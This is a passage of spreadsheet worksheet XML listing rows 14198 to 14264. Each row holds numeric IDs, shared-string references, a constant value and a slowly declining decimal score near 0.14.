    <row r="14198" ht="15.75" customHeight="1">
      <c r="A14198" s="1">
        <v>26578.0</v>
      </c>
      <c r="B14198" s="2">
        <v>1.7912245E7</v>
      </c>
      <c r="C14198" s="2" t="s">
        <v>13675</v>
      </c>
      <c r="D14198" s="2">
        <v>1.0</v>
      </c>
      <c r="E14198" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14198" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="14199" ht="15.75" customHeight="1">
      <c r="A14199" s="1">
        <v>10614.0</v>
      </c>
      <c r="B14199" s="2">
        <v>1.3728198E7</v>
      </c>
      <c r="C14199" s="2" t="s">
        <v>13676</v>
      </c>
      <c r="D14199" s="2">
        <v>1.0</v>
      </c>
      <c r="E14199" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14199" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="14200" ht="15.75" customHeight="1">
      <c r="A14200" s="1">
        <v>13629.0</v>
      </c>
      <c r="B14200" s="2">
        <v>3.5886011E7</v>
      </c>
      <c r="C14200" s="2" t="s">
        <v>13677</v>
      </c>
      <c r="D14200" s="2">
        <v>1.0</v>
      </c>
      <c r="E14200" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14200" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="14201" ht="15.75" customHeight="1">
      <c r="A14201" s="1">
        <v>2368.0</v>
      </c>
      <c r="B14201" s="2">
        <v>3.3243756E7</v>
      </c>
      <c r="C14201" s="2" t="s">
        <v>13678</v>
      </c>
      <c r="D14201" s="2">
        <v>1.0</v>
      </c>
      <c r="E14201" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14201" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="14202" ht="15.75" customHeight="1">
      <c r="A14202" s="1">
        <v>8308.0</v>
      </c>
      <c r="B14202" s="2">
        <v>5.3604959E7</v>
      </c>
      <c r="C14202" s="2" t="s">
        <v>13679</v>
      </c>
      <c r="D14202" s="2">
        <v>1.0</v>
      </c>
      <c r="E14202" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14202" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="14203" ht="15.75" customHeight="1">
      <c r="A14203" s="1">
        <v>13412.0</v>
      </c>
      <c r="B14203" s="2">
        <v>3.5008492E7</v>
      </c>
      <c r="C14203" s="2" t="s">
        <v>13680</v>
      </c>
      <c r="D14203" s="2">
        <v>1.0</v>
      </c>
      <c r="E14203" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14203" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="14204" ht="15.75" customHeight="1">
      <c r="A14204" s="1">
        <v>8755.0</v>
      </c>
      <c r="B14204" s="2">
        <v>5.4566282E7</v>
      </c>
      <c r="C14204" s="2" t="s">
        <v>13681</v>
      </c>
      <c r="D14204" s="2">
        <v>1.0</v>
      </c>
      <c r="E14204" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14204" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="14205" ht="15.75" customHeight="1">
      <c r="A14205" s="1">
        <v>15433.0</v>
      </c>
      <c r="B14205" s="2">
        <v>4.296348E7</v>
      </c>
      <c r="C14205" s="2" t="s">
        <v>13682</v>
      </c>
      <c r="D14205" s="2">
        <v>1.0</v>
      </c>
      <c r="E14205" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14205" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="14206" ht="15.75" customHeight="1">
      <c r="A14206" s="1">
        <v>1036.0</v>
      </c>
      <c r="B14206" s="2">
        <v>2.324351E7</v>
      </c>
      <c r="C14206" s="2" t="s">
        <v>13683</v>
      </c>
      <c r="D14206" s="2">
        <v>1.0</v>
      </c>
      <c r="E14206" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14206" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="14207" ht="15.75" customHeight="1">
      <c r="A14207" s="1">
        <v>18742.0</v>
      </c>
      <c r="B14207" s="2">
        <v>5.3736248E7</v>
      </c>
      <c r="C14207" s="2" t="s">
        <v>13684</v>
      </c>
      <c r="D14207" s="2">
        <v>1.0</v>
      </c>
      <c r="E14207" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14207" s="2">
        <v>0.142512077294686</v>
      </c>
    </row>
    <row r="14208" ht="15.75" customHeight="1">
      <c r="A14208" s="1">
        <v>18621.0</v>
      </c>
      <c r="B14208" s="2">
        <v>5.3353209E7</v>
      </c>
      <c r="C14208" s="2" t="s">
        <v>13685</v>
      </c>
      <c r="D14208" s="2">
        <v>1.0</v>
      </c>
      <c r="E14208" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14208" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="14209" ht="15.75" customHeight="1">
      <c r="A14209" s="1">
        <v>13835.0</v>
      </c>
      <c r="B14209" s="2">
        <v>3.6777191E7</v>
      </c>
      <c r="C14209" s="2" t="s">
        <v>13686</v>
      </c>
      <c r="D14209" s="2">
        <v>1.0</v>
      </c>
      <c r="E14209" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14209" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="14210" ht="15.75" customHeight="1">
      <c r="A14210" s="1">
        <v>6976.0</v>
      </c>
      <c r="B14210" s="2">
        <v>5.00194E7</v>
      </c>
      <c r="C14210" s="2" t="s">
        <v>13687</v>
      </c>
      <c r="D14210" s="2">
        <v>1.0</v>
      </c>
      <c r="E14210" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14210" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="14211" ht="15.75" customHeight="1">
      <c r="A14211" s="1">
        <v>29169.0</v>
      </c>
      <c r="B14211" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C14211" s="2" t="s">
        <v>13688</v>
      </c>
      <c r="D14211" s="2">
        <v>1.0</v>
      </c>
      <c r="E14211" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14211" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="14212" ht="15.75" customHeight="1">
      <c r="A14212" s="1">
        <v>12248.0</v>
      </c>
      <c r="B14212" s="2">
        <v>2.790978E7</v>
      </c>
      <c r="C14212" s="2" t="s">
        <v>13689</v>
      </c>
      <c r="D14212" s="2">
        <v>1.0</v>
      </c>
      <c r="E14212" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14212" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="14213" ht="15.75" customHeight="1">
      <c r="A14213" s="1">
        <v>12590.0</v>
      </c>
      <c r="B14213" s="2">
        <v>3.0057617E7</v>
      </c>
      <c r="C14213" s="2" t="s">
        <v>13690</v>
      </c>
      <c r="D14213" s="2">
        <v>1.0</v>
      </c>
      <c r="E14213" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14213" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="14214" ht="15.75" customHeight="1">
      <c r="A14214" s="1">
        <v>16091.0</v>
      </c>
      <c r="B14214" s="2">
        <v>4.5386471E7</v>
      </c>
      <c r="C14214" s="2" t="s">
        <v>13691</v>
      </c>
      <c r="D14214" s="2">
        <v>1.0</v>
      </c>
      <c r="E14214" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14214" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="14215" ht="15.75" customHeight="1">
      <c r="A14215" s="1">
        <v>31734.0</v>
      </c>
      <c r="B14215" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C14215" s="2" t="s">
        <v>13692</v>
      </c>
      <c r="D14215" s="2">
        <v>1.0</v>
      </c>
      <c r="E14215" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14215" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="14216" ht="15.75" customHeight="1">
      <c r="A14216" s="1">
        <v>27322.0</v>
      </c>
      <c r="B14216" s="2">
        <v>2.1394839E7</v>
      </c>
      <c r="C14216" s="2" t="s">
        <v>13693</v>
      </c>
      <c r="D14216" s="2">
        <v>1.0</v>
      </c>
      <c r="E14216" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14216" s="2">
        <v>0.1417378917378918</v>
      </c>
    </row>
    <row r="14217" ht="15.75" customHeight="1">
      <c r="A14217" s="1">
        <v>27919.0</v>
      </c>
      <c r="B14217" s="2">
        <v>2.3739644E7</v>
      </c>
      <c r="C14217" s="2" t="s">
        <v>13694</v>
      </c>
      <c r="D14217" s="2">
        <v>1.0</v>
      </c>
      <c r="E14217" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14217" s="2">
        <v>0.1414814814814815</v>
      </c>
    </row>
    <row r="14218" ht="15.75" customHeight="1">
      <c r="A14218" s="1">
        <v>9419.0</v>
      </c>
      <c r="B14218" s="2">
        <v>5.5794304E7</v>
      </c>
      <c r="C14218" s="2" t="s">
        <v>13695</v>
      </c>
      <c r="D14218" s="2">
        <v>1.0</v>
      </c>
      <c r="E14218" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14218" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="14219" ht="15.75" customHeight="1">
      <c r="A14219" s="1">
        <v>11726.0</v>
      </c>
      <c r="B14219" s="2">
        <v>2.3917017E7</v>
      </c>
      <c r="C14219" s="2" t="s">
        <v>13696</v>
      </c>
      <c r="D14219" s="2">
        <v>1.0</v>
      </c>
      <c r="E14219" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14219" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="14220" ht="15.75" customHeight="1">
      <c r="A14220" s="1">
        <v>17929.0</v>
      </c>
      <c r="B14220" s="2">
        <v>5.1200012E7</v>
      </c>
      <c r="C14220" s="2" t="s">
        <v>13697</v>
      </c>
      <c r="D14220" s="2">
        <v>1.0</v>
      </c>
      <c r="E14220" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14220" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="14221" ht="15.75" customHeight="1">
      <c r="A14221" s="1">
        <v>18567.0</v>
      </c>
      <c r="B14221" s="2">
        <v>5.3194367E7</v>
      </c>
      <c r="C14221" s="2" t="s">
        <v>13698</v>
      </c>
      <c r="D14221" s="2">
        <v>1.0</v>
      </c>
      <c r="E14221" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14221" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="14222" ht="15.75" customHeight="1">
      <c r="A14222" s="1">
        <v>30933.0</v>
      </c>
      <c r="B14222" s="2">
        <v>4.7158646E7</v>
      </c>
      <c r="C14222" s="2" t="s">
        <v>13699</v>
      </c>
      <c r="D14222" s="2">
        <v>1.0</v>
      </c>
      <c r="E14222" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14222" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="14223" ht="15.75" customHeight="1">
      <c r="A14223" s="1">
        <v>33974.0</v>
      </c>
      <c r="B14223" s="2">
        <v>9386004.0</v>
      </c>
      <c r="C14223" s="2" t="s">
        <v>13700</v>
      </c>
      <c r="D14223" s="2">
        <v>1.0</v>
      </c>
      <c r="E14223" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14223" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="14224" ht="15.75" customHeight="1">
      <c r="A14224" s="1">
        <v>9801.0</v>
      </c>
      <c r="B14224" s="2">
        <v>5.6564654E7</v>
      </c>
      <c r="C14224" s="2" t="s">
        <v>13701</v>
      </c>
      <c r="D14224" s="2">
        <v>1.0</v>
      </c>
      <c r="E14224" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14224" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="14225" ht="15.75" customHeight="1">
      <c r="A14225" s="1">
        <v>10651.0</v>
      </c>
      <c r="B14225" s="2">
        <v>1.4152062E7</v>
      </c>
      <c r="C14225" s="2" t="s">
        <v>13702</v>
      </c>
      <c r="D14225" s="2">
        <v>1.0</v>
      </c>
      <c r="E14225" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14225" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="14226" ht="15.75" customHeight="1">
      <c r="A14226" s="1">
        <v>14264.0</v>
      </c>
      <c r="B14226" s="2">
        <v>3.8391413E7</v>
      </c>
      <c r="C14226" s="2" t="s">
        <v>13703</v>
      </c>
      <c r="D14226" s="2">
        <v>1.0</v>
      </c>
      <c r="E14226" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14226" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="14227" ht="15.75" customHeight="1">
      <c r="A14227" s="1">
        <v>27255.0</v>
      </c>
      <c r="B14227" s="2">
        <v>2.108861E7</v>
      </c>
      <c r="C14227" s="2" t="s">
        <v>13704</v>
      </c>
      <c r="D14227" s="2">
        <v>1.0</v>
      </c>
      <c r="E14227" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14227" s="2">
        <v>0.1409465020576131</v>
      </c>
    </row>
    <row r="14228" ht="15.75" customHeight="1">
      <c r="A14228" s="1">
        <v>13696.0</v>
      </c>
      <c r="B14228" s="2">
        <v>3.6142037E7</v>
      </c>
      <c r="C14228" s="2" t="s">
        <v>13705</v>
      </c>
      <c r="D14228" s="2">
        <v>1.0</v>
      </c>
      <c r="E14228" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14228" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="14229" ht="15.75" customHeight="1">
      <c r="A14229" s="1">
        <v>3684.0</v>
      </c>
      <c r="B14229" s="2">
        <v>3.9464039E7</v>
      </c>
      <c r="C14229" s="2" t="s">
        <v>13706</v>
      </c>
      <c r="D14229" s="2">
        <v>1.0</v>
      </c>
      <c r="E14229" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14229" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="14230" ht="15.75" customHeight="1">
      <c r="A14230" s="1">
        <v>3981.0</v>
      </c>
      <c r="B14230" s="2">
        <v>4.0835671E7</v>
      </c>
      <c r="C14230" s="2" t="s">
        <v>13707</v>
      </c>
      <c r="D14230" s="2">
        <v>1.0</v>
      </c>
      <c r="E14230" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14230" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="14231" ht="15.75" customHeight="1">
      <c r="A14231" s="1">
        <v>28601.0</v>
      </c>
      <c r="B14231" s="2">
        <v>2.70909E7</v>
      </c>
      <c r="C14231" s="2" t="s">
        <v>13708</v>
      </c>
      <c r="D14231" s="2">
        <v>1.0</v>
      </c>
      <c r="E14231" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14231" s="2">
        <v>0.1404494382022472</v>
      </c>
    </row>
    <row r="14232" ht="15.75" customHeight="1">
      <c r="A14232" s="1">
        <v>1433.0</v>
      </c>
      <c r="B14232" s="2">
        <v>2.6653399E7</v>
      </c>
      <c r="C14232" s="2" t="s">
        <v>13709</v>
      </c>
      <c r="D14232" s="2">
        <v>1.0</v>
      </c>
      <c r="E14232" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14232" s="2">
        <v>0.1403133903133903</v>
      </c>
    </row>
    <row r="14233" ht="15.75" customHeight="1">
      <c r="A14233" s="1">
        <v>3053.0</v>
      </c>
      <c r="B14233" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C14233" s="2" t="s">
        <v>13710</v>
      </c>
      <c r="D14233" s="2">
        <v>1.0</v>
      </c>
      <c r="E14233" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14233" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="14234" ht="15.75" customHeight="1">
      <c r="A14234" s="1">
        <v>923.0</v>
      </c>
      <c r="B14234" s="2">
        <v>2.230114E7</v>
      </c>
      <c r="C14234" s="2" t="s">
        <v>13711</v>
      </c>
      <c r="D14234" s="2">
        <v>1.0</v>
      </c>
      <c r="E14234" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14234" s="2">
        <v>0.1401326699834163</v>
      </c>
    </row>
    <row r="14235" ht="15.75" customHeight="1">
      <c r="A14235" s="1">
        <v>17076.0</v>
      </c>
      <c r="B14235" s="2">
        <v>4.8609534E7</v>
      </c>
      <c r="C14235" s="2" t="s">
        <v>13712</v>
      </c>
      <c r="D14235" s="2">
        <v>1.0</v>
      </c>
      <c r="E14235" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14235" s="2">
        <v>0.1401326699834163</v>
      </c>
    </row>
    <row r="14236" ht="15.75" customHeight="1">
      <c r="A14236" s="1">
        <v>8404.0</v>
      </c>
      <c r="B14236" s="2">
        <v>5.3881828E7</v>
      </c>
      <c r="C14236" s="2" t="s">
        <v>13713</v>
      </c>
      <c r="D14236" s="2">
        <v>1.0</v>
      </c>
      <c r="E14236" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14236" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="14237" ht="15.75" customHeight="1">
      <c r="A14237" s="1">
        <v>14536.0</v>
      </c>
      <c r="B14237" s="2">
        <v>3.9864859E7</v>
      </c>
      <c r="C14237" s="2" t="s">
        <v>13714</v>
      </c>
      <c r="D14237" s="2">
        <v>1.0</v>
      </c>
      <c r="E14237" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14237" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="14238" ht="15.75" customHeight="1">
      <c r="A14238" s="1">
        <v>22570.0</v>
      </c>
      <c r="B14238" s="2">
        <v>3.8537923E7</v>
      </c>
      <c r="C14238" s="2" t="s">
        <v>13715</v>
      </c>
      <c r="D14238" s="2">
        <v>1.0</v>
      </c>
      <c r="E14238" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14238" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="14239" ht="15.75" customHeight="1">
      <c r="A14239" s="1">
        <v>30380.0</v>
      </c>
      <c r="B14239" s="2">
        <v>3.8537922E7</v>
      </c>
      <c r="C14239" s="2" t="s">
        <v>13715</v>
      </c>
      <c r="D14239" s="2">
        <v>1.0</v>
      </c>
      <c r="E14239" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14239" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="14240" ht="15.75" customHeight="1">
      <c r="A14240" s="1">
        <v>5278.0</v>
      </c>
      <c r="B14240" s="2">
        <v>4.5166346E7</v>
      </c>
      <c r="C14240" s="2" t="s">
        <v>13716</v>
      </c>
      <c r="D14240" s="2">
        <v>1.0</v>
      </c>
      <c r="E14240" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14240" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="14241" ht="15.75" customHeight="1">
      <c r="A14241" s="1">
        <v>31973.0</v>
      </c>
      <c r="B14241" s="2">
        <v>5316476.0</v>
      </c>
      <c r="C14241" s="2" t="s">
        <v>13717</v>
      </c>
      <c r="D14241" s="2">
        <v>1.0</v>
      </c>
      <c r="E14241" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14241" s="2">
        <v>0.1397058823529412</v>
      </c>
    </row>
    <row r="14242" ht="15.75" customHeight="1">
      <c r="A14242" s="1">
        <v>7041.0</v>
      </c>
      <c r="B14242" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C14242" s="2" t="s">
        <v>13718</v>
      </c>
      <c r="D14242" s="2">
        <v>1.0</v>
      </c>
      <c r="E14242" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14242" s="2">
        <v>0.1395833333333333</v>
      </c>
    </row>
    <row r="14243" ht="15.75" customHeight="1">
      <c r="A14243" s="1">
        <v>6347.0</v>
      </c>
      <c r="B14243" s="2">
        <v>4.8313388E7</v>
      </c>
      <c r="C14243" s="2" t="s">
        <v>13719</v>
      </c>
      <c r="D14243" s="2">
        <v>1.0</v>
      </c>
      <c r="E14243" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14243" s="2">
        <v>0.139520202020202</v>
      </c>
    </row>
    <row r="14244" ht="15.75" customHeight="1">
      <c r="A14244" s="1">
        <v>5455.0</v>
      </c>
      <c r="B14244" s="2">
        <v>4.5657531E7</v>
      </c>
      <c r="C14244" s="2" t="s">
        <v>13720</v>
      </c>
      <c r="D14244" s="2">
        <v>1.0</v>
      </c>
      <c r="E14244" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14244" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="14245" ht="15.75" customHeight="1">
      <c r="A14245" s="1">
        <v>8609.0</v>
      </c>
      <c r="B14245" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C14245" s="2" t="s">
        <v>13721</v>
      </c>
      <c r="D14245" s="2">
        <v>1.0</v>
      </c>
      <c r="E14245" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14245" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="14246" ht="15.75" customHeight="1">
      <c r="A14246" s="1">
        <v>9445.0</v>
      </c>
      <c r="B14246" s="2">
        <v>5.5818755E7</v>
      </c>
      <c r="C14246" s="2" t="s">
        <v>13722</v>
      </c>
      <c r="D14246" s="2">
        <v>1.0</v>
      </c>
      <c r="E14246" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14246" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="14247" ht="15.75" customHeight="1">
      <c r="A14247" s="1">
        <v>17419.0</v>
      </c>
      <c r="B14247" s="2">
        <v>4.9694257E7</v>
      </c>
      <c r="C14247" s="2" t="s">
        <v>13723</v>
      </c>
      <c r="D14247" s="2">
        <v>1.0</v>
      </c>
      <c r="E14247" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14247" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="14248" ht="15.75" customHeight="1">
      <c r="A14248" s="1">
        <v>27854.0</v>
      </c>
      <c r="B14248" s="2">
        <v>2.342753E7</v>
      </c>
      <c r="C14248" s="2" t="s">
        <v>13724</v>
      </c>
      <c r="D14248" s="2">
        <v>1.0</v>
      </c>
      <c r="E14248" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14248" s="2">
        <v>0.1393762183235867</v>
      </c>
    </row>
    <row r="14249" ht="15.75" customHeight="1">
      <c r="A14249" s="1">
        <v>274.0</v>
      </c>
      <c r="B14249" s="2">
        <v>1.5310621E7</v>
      </c>
      <c r="C14249" s="2" t="s">
        <v>13725</v>
      </c>
      <c r="D14249" s="2">
        <v>1.0</v>
      </c>
      <c r="E14249" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14249" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="14250" ht="15.75" customHeight="1">
      <c r="A14250" s="1">
        <v>10066.0</v>
      </c>
      <c r="B14250" s="2">
        <v>5.7141524E7</v>
      </c>
      <c r="C14250" s="2" t="s">
        <v>13726</v>
      </c>
      <c r="D14250" s="2">
        <v>1.0</v>
      </c>
      <c r="E14250" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14250" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="14251" ht="15.75" customHeight="1">
      <c r="A14251" s="1">
        <v>19342.0</v>
      </c>
      <c r="B14251" s="2">
        <v>5.5357414E7</v>
      </c>
      <c r="C14251" s="2" t="s">
        <v>13727</v>
      </c>
      <c r="D14251" s="2">
        <v>1.0</v>
      </c>
      <c r="E14251" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14251" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="14252" ht="15.75" customHeight="1">
      <c r="A14252" s="1">
        <v>13713.0</v>
      </c>
      <c r="B14252" s="2">
        <v>3.6248554E7</v>
      </c>
      <c r="C14252" s="2" t="s">
        <v>13728</v>
      </c>
      <c r="D14252" s="2">
        <v>1.0</v>
      </c>
      <c r="E14252" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14252" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="14253" ht="15.75" customHeight="1">
      <c r="A14253" s="1">
        <v>7574.0</v>
      </c>
      <c r="B14253" s="2">
        <v>5.1575645E7</v>
      </c>
      <c r="C14253" s="2" t="s">
        <v>13729</v>
      </c>
      <c r="D14253" s="2">
        <v>1.0</v>
      </c>
      <c r="E14253" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14253" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="14254" ht="15.75" customHeight="1">
      <c r="A14254" s="1">
        <v>10227.0</v>
      </c>
      <c r="B14254" s="2">
        <v>5.7482511E7</v>
      </c>
      <c r="C14254" s="2" t="s">
        <v>13730</v>
      </c>
      <c r="D14254" s="2">
        <v>1.0</v>
      </c>
      <c r="E14254" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14254" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="14255" ht="15.75" customHeight="1">
      <c r="A14255" s="1">
        <v>24345.0</v>
      </c>
      <c r="B14255" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C14255" s="2" t="s">
        <v>13731</v>
      </c>
      <c r="D14255" s="2">
        <v>1.0</v>
      </c>
      <c r="E14255" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14255" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="14256" ht="15.75" customHeight="1">
      <c r="A14256" s="1">
        <v>1668.0</v>
      </c>
      <c r="B14256" s="2">
        <v>2.8215805E7</v>
      </c>
      <c r="C14256" s="2" t="s">
        <v>13732</v>
      </c>
      <c r="D14256" s="2">
        <v>1.0</v>
      </c>
      <c r="E14256" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14256" s="2">
        <v>0.1385836385836386</v>
      </c>
    </row>
    <row r="14257" ht="15.75" customHeight="1">
      <c r="A14257" s="1">
        <v>7762.0</v>
      </c>
      <c r="B14257" s="2">
        <v>5.2106134E7</v>
      </c>
      <c r="C14257" s="2" t="s">
        <v>13733</v>
      </c>
      <c r="D14257" s="2">
        <v>1.0</v>
      </c>
      <c r="E14257" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14257" s="2">
        <v>0.1384742951907132</v>
      </c>
    </row>
    <row r="14258" ht="15.75" customHeight="1">
      <c r="A14258" s="1">
        <v>15479.0</v>
      </c>
      <c r="B14258" s="2">
        <v>4.3177268E7</v>
      </c>
      <c r="C14258" s="2" t="s">
        <v>13734</v>
      </c>
      <c r="D14258" s="2">
        <v>1.0</v>
      </c>
      <c r="E14258" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14258" s="2">
        <v>0.1384742951907131</v>
      </c>
    </row>
    <row r="14259" ht="15.75" customHeight="1">
      <c r="A14259" s="1">
        <v>1738.0</v>
      </c>
      <c r="B14259" s="2">
        <v>2.8784338E7</v>
      </c>
      <c r="C14259" s="2" t="s">
        <v>13735</v>
      </c>
      <c r="D14259" s="2">
        <v>1.0</v>
      </c>
      <c r="E14259" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14259" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="14260" ht="15.75" customHeight="1">
      <c r="A14260" s="1">
        <v>2036.0</v>
      </c>
      <c r="B14260" s="2">
        <v>3.0859633E7</v>
      </c>
      <c r="C14260" s="2" t="s">
        <v>13736</v>
      </c>
      <c r="D14260" s="2">
        <v>1.0</v>
      </c>
      <c r="E14260" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14260" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="14261" ht="15.75" customHeight="1">
      <c r="A14261" s="1">
        <v>18414.0</v>
      </c>
      <c r="B14261" s="2">
        <v>5.2690414E7</v>
      </c>
      <c r="C14261" s="2" t="s">
        <v>13737</v>
      </c>
      <c r="D14261" s="2">
        <v>1.0</v>
      </c>
      <c r="E14261" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14261" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="14262" ht="15.75" customHeight="1">
      <c r="A14262" s="1">
        <v>25572.0</v>
      </c>
      <c r="B14262" s="2">
        <v>1.4332045E7</v>
      </c>
      <c r="C14262" s="2" t="s">
        <v>13738</v>
      </c>
      <c r="D14262" s="2">
        <v>1.0</v>
      </c>
      <c r="E14262" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14262" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="14263" ht="15.75" customHeight="1">
      <c r="A14263" s="1">
        <v>28991.0</v>
      </c>
      <c r="B14263" s="2">
        <v>2.9861534E7</v>
      </c>
      <c r="C14263" s="2" t="s">
        <v>13739</v>
      </c>
      <c r="D14263" s="2">
        <v>1.0</v>
      </c>
      <c r="E14263" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14263" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="14264" ht="15.75" customHeight="1">
      <c r="A14264" s="1">
        <v>33671.0</v>
      </c>
      <c r="B14264" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C14264" s="2" t="s">
        <v>13740</v>
      </c>
      <c r="D14264" s="2">
        <v>1.0</v>
      </c>
      <c r="E14264" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14264" s="2">
        <v>0.1380718954248367</v>
      </c>
    </row>
